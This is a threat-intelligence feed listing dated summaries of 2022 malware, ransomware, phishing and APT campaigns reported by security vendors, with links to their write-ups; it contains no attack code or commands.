- Date of Scan:
- 2022-05-25
- Impact:
- Medium
- Summary:
- BlackBerry research and intelligence team have discovered details of the latest version of the Chaos ransomware line, dubbed Yashma. Though Chaos ransomware builder has only been in the wild for a year Yashma claims to be the sixth version (v6.0) of this malware.
Source:
https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree
—
- Intel Source:
- Cyble
- Intel Name:
- Threat_Actor_leverage_Fake_Proof_Of_Concept_to_deliver_CobaltStrike
- Date of Scan:
- 2022-05-25
- Impact:
- LOW
- Summary:
- A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_variant_of_Nokoyawa_Ransomware
- Date of Scan:
- 2022-05-25
- Impact:
- Medium
- Summary:
- Researchers at Fortinet has discovered Nokoyawa Ransomware is a new variant of the Nemty ransomware that has been improving itself.
Source:
https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Unknown_APT_group_targeted_Russia_repeatedly
- Date of Scan:
- 2022-05-25
- Impact:
- Low
- Summary:
- Researchers from MalwareBytes Threat Intelligence Team discovered campaigns by unknown threat actors targeting Russia. The APT group has launched at least four campaigns since late February.
—
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed_Purchase_Order_drops_GuLoader_Malware
- Date of Scan:
- 2022-05-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has analysed a phishing email purporting to be a purchase order by an oil provider in Saudi Arabia, the partial PDF file image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained an executable for GuLoader.
Source:
https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader
—
- Intel Source:
- Microsoft
- Intel Name:
- Web_Skimmers_mimicking_Google_Analytics_and_Meta_Pixel_Code
- Date of Scan:
- 2022-05-25
- Impact:
- MEDIUM
- Summary:
- Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection.
—
- Intel Source:
- Sonatype
- Intel Name:
- New_pymafka_malicious_package_drops_CobaltStrike_on_macOS_Windows_Linux
- Date of Scan:
- 2022-05-24
- Impact:
- Low
- Summary:
- Sonatype’s automated malware detection bots have discovered malicious Python package ‘pymafka’ in the PyPI registry. PyMafka drops Cobalt Strike on Windows, macOS . The package, ‘pymafka’ may sound identical to the popular PyKafka. The package appears to typosquat a legitimate popular library PyKafka, a programmer-friendly Apache Kafka client for Python.
Source:
https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux
—
- Intel Source:
- Checkpoint
- Intel Name:
- Twisted_Panda_Espionage_Operation
- Date of Scan:
- 2022-05-24
- Impact:
- Medium
- Summary:
- Check Point Research team have details a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes, part of the Rostec Corporation. The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- PDF_delivering_Snake_Keylogger_Malware
- Date of Scan:
- 2022-05-24
- Impact:
- Medium
- Summary:
- HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.
Source:
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- PDF_delivering_Snake_Keylogger_Malware
- Date of Scan:
- 2022-05-24
- Impact:
- Medium
- Summary:
- HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.
Source:
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#
—
- Intel Source:
- Confense
- Intel Name:
- Hackers_utilize_SwissTransfer_to_deploy_Phishing_Scam
- Date of Scan:
- 2022-05-24
- Impact:
- Low
- Summary:
- Recently the Cofense Phishing Defence Center noticed a number of emails utilising the SwissTransfer service to achieve successful phishes against recipients. An attack vector is file sharing services such as WeTransfer, Microsoft OneDrive and Dropbox have been utilized to spread files containing anything from scams to malware leading to ransomware.
Source:
https://cofense.com/blog/hackers-utilize-swisstransfer-to-deploy-phishing-scam
—
- Intel Source:
- ASEC
- Intel Name:
- Emotet getting distributed through Link Files
- Date of Scan:
- 2022-05-23
- Impact:
- Low
- Summary:
- ASEC researchers recently discovered Emotet getting distributed through various files including Link Files.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Supply_Chain_Attack_targets_GitLab_CI_Pipelines
- Date of Scan:
- 2022-05-23
- Impact:
- Medium
- Summary:
- Researchers from SentinelLabs identified a software chain supply attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines. The campaign has been dubbed as CrateDepression.
—
- Intel Source:
- Microsoft
- Intel Name:
- XorDdos_targeting_Linux_devices
- Date of Scan:
- 2022-05-23
- Impact:
- Medium
- Summary:
- Microsoft researchers saw and 254% increase in activity of a stealthy and modular malware which is used to hack into Linux devices and build a DDoS botnet. The malware is called XorDDoS.
—
- Intel Source:
- Zscaler
- Intel Name:
- Vidar_Malware_distributed_through_fake_Windows11_downloads
- Date of Scan:
- 2022-05-23
- Impact:
- Low
- Summary:
- Researchers from Zscalers came across fraudulent domains masquerading as Microsoft’s Windows 11 download portal which are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.
—
- Intel Source:
- Asec
- Intel Name:
- Lazarus_Group_Exploiting_Log4Shell_Vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from ASEC discovered Lazarus group distributing NukeSped by exploiting Log4Shell vulnerability. The threat actor used the log4j vulnerability on VMware Horizon products that were not applied with the security patch.
—
- Intel Source:
- PtSecurity
- Intel Name:
- Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Analysts at Positive Technologies came across a previously unknown Chinese hacking group known as ‘Space Pirates’ targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems. They have dubbed the threat actor Space Pirates.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- All_about_ITG23_Crypters
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.
Source:
https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
- Date of Scan:
- 2022-05-20
- Impact:
- Low
- Summary:
- Researchers at ISC.SANS were able to relate Bumblebee malware with EXOTIC LILY threat actor, as they saw usage of active TransferXL URLs delivering ISO files for Bumblebee malware.
—
- Intel Source:
- CISA
- Intel Name:
- Threat_Actors_exploiting_VMware_vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
—
- Intel Source:
- WeiXin
- Intel Name:
- Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from 360 Threat Intelligence Center came across an attack activity launched by APT-C-24/Sidewinder in which the threat actor has come up with New TTP.
—
- Intel Source:
- Barracuda
- Intel Name:
- VMware_Bugs_Abused_to_Deliver_Mirai
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Barracuda discovered that attempts were made to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was getting delivered by abusing the VMware Bug.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Threat Actors targets US Business Online Checkout Page
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet_The_journey
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background on Emotet, its activity since november 2021 and ending with January 2022.
Source:
https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
—
- Intel Source:
- Sucuri
- Intel Name:
- X_Cart_Skimmer_with_DOM_based_Obfuscation
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- Security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there — one skimmer located server-side, the other client-side.
Source:
https://blog.sucuri.net/2022/05/x-cart-skimmer-with-dom-based-obfuscation.html
—
- Intel Source:
- Trend Micro
- Intel Name:
- RansomEXX_and_its_TTPs
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from TrendMicro sheds light on the Tactics and Techniques of ransomware variant called RansomEXX which have been active since 2020.
—
- Intel Source:
- Prodaft
- Intel Name:
- Wizard_Spider_Group_In_Depth_Analysis
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.
Source:
https://www.prodaft.com/resource/detail/ws-wizard-spider-group-depth-analysis
—
- Intel Source:
- NTT Security
- Intel Name:
- Operation RestyLink targeting Japenese Firms
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from NTT security observed APT campaign targeting Japanese companies starting from mid of April 2022. The initial attack vector in this campaign was spear phishing email.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Uncovering_Kingminer_Botnet_Attack
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- Researchers from Trend Micro details about the TTPs of the Kinginer Botnet. In 2020 threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.
—
- Intel Source:
- Fortinet
- Intel Name:
- Chaos_Ransomware_stands_with_Russia
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware have been leveraginhg Russia Ukraine conflict.
Source:
https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
—
- Intel Source:
- Jamf
- Intel Name:
- UpdateAgent_Returns_with_New_macOS_Malware_Dropper
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UN_social_program_themed_online_fraud
- Date of Scan:
- 2022-05-17
- Impact:
- Medium
- Summary:
- CERT-UA researchers recently responded to discovery of fraudulent page on facebook that mimics the resource of the TV channel “TSN”.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Malicious_HTML_Help_File_Delivering_Agent_Tesla
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.
Source:
https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Custom_PowerShell_RAT_targets_Germans
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from MalwareBytes came across a new campaign that plays on concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine and later infecting the victims with RAT.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Onyx_Ransomware
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.
Source:
https://www.cyfirma.com/outofband/onyx-ransomware-report/
—
- Intel Source:
- JPCERT
- Intel Name:
- Analysis_of_the_HUI_Loader
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- JPCERT researchers shared their analysis of the HUI Loader which has been used by multiple attack groups since around 2015, also the malware have been used by APT10.
Source:
https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html
—
- Intel Source:
- Uptycs
- Intel Name:
- KurayStealer_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers at Uptycs came across a new malware builder dubbed as KurayStealer that has password stealing and screenshot capabilities.The malware harvests the passwords and screenshots and sends them to the attackers’ Discord channel via webhooks.
Source:
https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Novel IceApple Post-Exploitation Framework
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from CrowdStrike found New ‘post-exploitation’ threat getting deployed on Microsoft Exchange servers. The threat has been dubbed as IceApple.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_0_Day_to_Mirai
- Date of Scan:
- 2022-05-16
- Impact:
- High
- Summary:
- Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.
—
- Intel Source:
- Cluster25
- Intel Name:
- APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the usage of a side-loaded DLL through signed software (like Adobe suite) and legitimate webservices (like Dropbox) as communication vector for Command and Control (C&C).
Source:
https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/
—
- Intel Source:
- Cyble
- Intel Name:
- Telegram_used_to_spread_Eternity_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, allows cybercriminals to target potential victims with a customized threat offering based on individual modules.
Source:
https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/
—
- Intel Source:
- Cybereason
- Intel Name:
- Quantum_Locker_Ransomware
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is infamous malware called IceID.
Source:
https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware
—
- Intel Source:
- NetSkope
- Intel Name:
- RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at NetSpoke Threat Labs has discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot to buy Mystery Box NFT from Binance. The video description leads the victim to download the fake bot which is hosted on GitHub.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- APT34_targets_Jordan_Government_using_new_Saitama_backdoor
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at Malwarebytes have discovered a malicious email targeting a government official at Jordan’s foreign ministry and researchers identified a suspicious message on April 26. It contained a malicious Excel document that delivered Saitama – a new hacking tool used to provide a backdoor into systems. Malwarebytes attributed the email to a threat group commonly known as APT34.
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
- Date of Scan:
- 2022-05-13
- Impact:
- Low
- Summary:
- Researchers at Fortinet’s FortiGaurd Labs has analysed a phishing campaign that was delivering three fileless malware onto a victim’s device. Once executed, Malware are able to steal sensitive information from that device. It is majorly affecting Microsoft Windows platform users.
Source:
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
—
- Intel Source:
- SecureWorks
- Intel Name:
- Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Source:
https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- CERT-UA has analysed a phishing campaign with a subject as “On revenge in Kherson!” and containing an attachment in the form of a file “Plan Kherson.htm”. The campaign is using a malicious program GammaLoad.PS1_v2 and attributed to a group called UAC-0010 (Armageddon).
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Bitter APT expands its target list
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- An espionage-focused threat actor(Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has included Bangladeshi government organizations as part of an ongoing campaign.
Source:
https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Proofpoint researchers found previously undocumented remote access trojan (RAT) called Nerbian RAT written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Critical_F5_BIG_IP_Vulnerability_New_IoCs
- Date of Scan:
- 2022-05-12
- Impact:
- High
- Summary:
- Researchers from PaloAlto have also released few indicators of compromise and their view on Critical F5 BIG-IP Vulnerability.
—
- Intel Source:
- JFrog
- Intel Name:
- Malicious_NPM_Packages_targets_German_Companies
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Researchers from Jfrog have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent companies based in Germany to carry out supply chain attacks.
Source:
https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- TA578_distributing_Bumblebee_malware
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- Researchers at ISC.SANS has analysed a campaign where threat actor TA578 leveraging thread-hijacked emails to push ISO files for Bumblebee malware. These threat-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Examining_BlackBasta_ransomware
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- TrendMicro researchers have examined the whole infection routine of Black Basta ransomware and its infection tactics.
—
- Intel Source:
- checkpoint
- Intel Name:
- German_Automakers_targeted_by_InfoStealer_campaign
- Date of Scan:
- 2022-05-11
- Impact:
- Low
- Summary:
- Checkpoint researchers discovered A years-long phishing campaign has targeted German companies in the automotive industry, attempting to infect their systems with password-stealing malware.
Source:
https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/
—
- Intel Source:
- SecureWorks
- Intel Name:
- REvil_returns_reemergening_GOLD_SOUTHFIELD
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples and this has resumed operations of GOLD SOUTHFIELD. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Source:
https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence
—
- Intel Source:
- Qualys
- Intel Name:
- New_Wave_of_Ursnif_Malware
- Date of Scan:
- 2022-05-11
- Impact:
- High
- Summary:
- Researchers at Qualys has discovered and analysed few phishing emails with a macro embedded XLS attachment or a zip attachment containing an HTA file initiated the infection chain. This targeted attack researchers attributed to Ursnif malware which is one of the most widespread banking trojans.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Different_elements_of_Cobalt_Strike
- Date of Scan:
- 2022-05-11
- Impact:
- Medium
- Summary:
- Palo Alto Unit42 researchers has analysed Cobalt Strike tool and gone through the encoding algorithm, describe definitions and differences of encoding types used in the Cobalt Strike framework, and cover some malicious attacks seen in the wild.
—
- Intel Source:
- Fortinet
- Intel Name:
- Recent Emotet Maldoc Outbreak
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet has identified a recent Emotet outbreak is being spread through a variety of malicious Microsoft Office files or maldocs attached to phishing emails. Once a victim opens the attached document a VBA Macro or Excel 4.0 Macro is used to execute malicious code that downloads and runs the Emotet malware.
Source:
https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
—
- Intel Source:
- Symantec
- Intel Name:
- Lazarus Group Targets Chemical Sector
- Date of Scan:
- 2022-04-19
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed Lazarus group conducting an espionage campaign targeting organizations operating within the chemical sector. This campaign has been dubbed Operation Drem Job.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
—
- Intel Source:
- Seguranca-Informatica
- Intel Name:
- SunnyDay Ransomware
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work some similarities between other ransomware samples such as Ever101 Medusa Locker Curator and Payment45 were found. According to the analysis “SunnyDay is a simple piece of ransomware based on the SALSA20 stream cipher”. SALSA20 is easy to recognize as it uses well-known values for its internal cryptographic operations.
Source:
https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/#.Yl0eXdtBxPY
—
- Intel Source:
- Microsoft/ESET
- Intel Name:
- Coordinated disruption of Zloader operation
- Date of Scan:
- 2022-04-19
- Impact:
- LOW
- Summary:
- DCU unit from Microsoft have taken technical action against Zloader and have disrupted their operations.ZLoader is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.
—
- Intel Source:
- Cynet
- Intel Name:
- BumbleBee Malware campaign
- Date of Scan:
- 2022-04-18
- Impact:
- LOW
- Summary:
- Researchers from Cynet Security found a new campaign which instead of using malicious office documents is using malicious ISO image files luring victims to execute the BumbleBee malware.
Source:
https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_22954_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Prodaft
- Intel Name:
- Indepth analysis of PYSA Ransomware Group
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at PRODAFT has identified and gained visibility into PYSA’s ransomware infrastructure and analyzed its findings to gain insight into how the criminal operation works.
Source:
https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis
—
- Intel Source:
- STR
- Intel Name:
- CVE_2022_24527_Seeder_Queries_14042022
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- CERT-UA
- Intel Name:
- XSS Vulnerability in Zimbra leveraged to target Ukraine Government
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- CERT-UA has detected threat actors are targeting Ukrainian government agencies with new attacks exploiting Zimbra XSS Vulnerability (CVE-2018-6882). CERT-UA has attributed this campaign to UAC-0097 a currently unknown actor.
—
- Intel Source:
- netlab360
- Intel Name:
- New Fodcha DDoS botnet
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360’s Network Security Research Lab has discovered a new DDoS botnet called ‘Fodcha’. The Botnet has spread to over 62 000 devices between March 29 and April 10. The number of unique IP addresses linked to the botnet that researchers are tracking is10 000-strong Fodcha army of bots using Chinese IP addresses every day.
Source:
https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/
—
- Intel Source:
- SecureList
- Intel Name:
- Emotet Modules and Recent Attacks
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Kaspersky were able to etrieve 10 of the 16 modules used by Emotet for Credential/Password/Account/E-mail stealing and spamming. Also the statistics on recent Emotet attacks were also shared.
Source:
https://securelist.com/emotet-modules-and-recent-attacks/106290/
—
- Intel Source:
- SecureList
- Intel Name:
- New File extensions added to BlackCat ransomware’s arsenal
- Date of Scan:
- 2022-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureList has analysed BlackCat Ransomware Group’s activities since its inception. They are also comparing BlackCat TTPs with BlackMatter Group like a custom exflitration tool called ‘Fendr’ previously been used exclusively in BlackMatter ransomware activity.
—
- Intel Source:
- Microsoft
- Intel Name:
- Critical Remote Code Execution Vulnerability in Windows RPC Runtime
- Date of Scan:
- 2022-04-14
- Impact:
- HIGH
- Summary:
- Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime: CVE-2022-24492 CVE-2022-24528 and CVE-2022-26809. By exploiting these vulnerabilities a remote unauthenticated attacker can execute code on the vulnerable machine with the privileges of the RPC service which depends on the process hosting the RPC runtime.
—
- Intel Source:
- Fortinet
- Intel Name:
- Enemybot leveraged by Keksec group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at FortiGuard Labs have identified a new DDoS botnet called “Enemybot” and attributed it to a threat group called ‘Keksec’ that specializes in cryptomining and DDoS attacks. This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
Source:
https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet
—
- Intel Source:
- ASEC
- Intel Name:
- Virus/XLS Xanpei Infecting Excel Files
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- ASEC Research team have identified a constant distribution of malware strains that spread the infection when Excel file is opened. Upon opening the infected Excel file the file containing virus VBA code is dropped to Excel startup path. And when any Excel file is opened the malicious file dropped in Excel startup path is automatically executed to infect with virus and perform additional malicious behaviors.
—
- Intel Source:
- Group-IB
- Intel Name:
- OldGremlin Gang resumes attack with new methods
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Group-IB has uncovered new attacks tools and methods used by OldGremlin Ransomware Group. In spring 2020 Group was first identified by Group-IB researchers over the past two years OldGremlin has conducted 13 malicious email campaigns. Researchers also discovered two variants of TinyFluff malware an earlier one that is more complex and a newer simplified version that copies the script and the Node.js interpreter from its storage location.
—
- Intel Source:
- CERT-UA
- Intel Name:
- IcedID malware targeting Ukraine state bodies
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA has issued a new heads-up that warns of an ongoing cyber-attack leveraging the infamous IcedID malware designed to compromise Ukrainian state bodies. The detected malware also dubbed as BankBot or BokBot is a banking Trojan primarily designed to target financial data and steal banking credentials.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Malware Campaigns Targeting African Banking Sector
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from HP Wolf Security have been tracking the campaign since early 2022 an employee of an unnamed West African bank received an email purporting to be from a recruiter at another African bank with information about job opportunities. A cybercrime campaign targeting the African banking sector is leveraging phishing emails and HTML smuggling techniques to deploy malware.
Source:
https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- ZingoStealer by Haskers Group
- Date of Scan:
- 2022-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos has identified a new information stealer called ‘ZingoStealer’ that has been released for free by a threat actor known as ‘Haskers Gang.’ This information stealer first introduced to the wild in March 2022 is currently undergoing active development and multiple releases of new versions have been observed recently.
—
- Intel Source:
- 360 Beacon Lab
- Intel Name:
- Bahamut group recent attacks
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- Researcher at 360 Beacon Lab has identifed a suspected mobile terminal attack activity of Bahamut group. Bahamut is an advanced threat group targeting the Middle East and South Asia. Group mainly uses phishing websites fake news websites and social networking sites to attack.
Source:
https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw?_x_tr_sl=zh-CN&_x_tr_tl=en&_x_tr_hl=zh-CN
—
- Intel Source:
- CERT-UA
- Intel Name:
- Sandworm Group (UAC-0082) targetiing Ukraine energy facilities using INDUSTROYER2 and CADDYWIPER
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- CERT-UA has taken urgent measures to respond to an information security incident related to a targeted attack on Ukraine’s energy facility.
—
- Intel Source:
- ASEC
- Intel Name:
- SystemBC Malware
- Date of Scan:
- 2022-04-12
- Impact:
- MEDIUM
- Summary:
- ASEC Research team have identified a proxy malware called SystemBC that has been used by various attackers for the last few years. While it is recently distributed through SmokeLoader or Emotet this malware has steadily been used in various ransomware attacks in the past.
—
- Intel Source:
- TeamCymru
- Intel Name:
- MoqHao Malware targeting European countries
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at TeamCymru has examined the current target base of Roaming Mantis group where the group is levearging MoqHao malware to target European countries. MoqHao is generally used to target Android users often via an initial attack vector of smishing.
Source:
https://team-cymru.com/blog/2022/04/07/moqhao-part-2-continued-european-expansion/
—
- Intel Source:
- ClearSky
- Intel Name:
- EvilNominatus Ransomware
- Date of Scan:
- 2022-04-12
- Impact:
- LOW
- Summary:
- Researchers at ClearSky has detected a malicious BAT file that was uploaded to VirusTotal from Iran. This file executes a ransomware that was associated with the EvilNominatus ransomware initially exposed at the end of 2021. Researchers believe that the ransomware’s developer is a young Iranian who bragged about its development on Twitter.
Source:
https://www.clearskysec.com/wp-content/uploads/2022/04/EvilNominatus_Ransomware_7.4.22.pdf
—
- Intel Source:
- STR
- Intel Name:
- NetSupport RAT_Seeder_Queries_08/04/2022
- Date of Scan:
- 2022-04-12
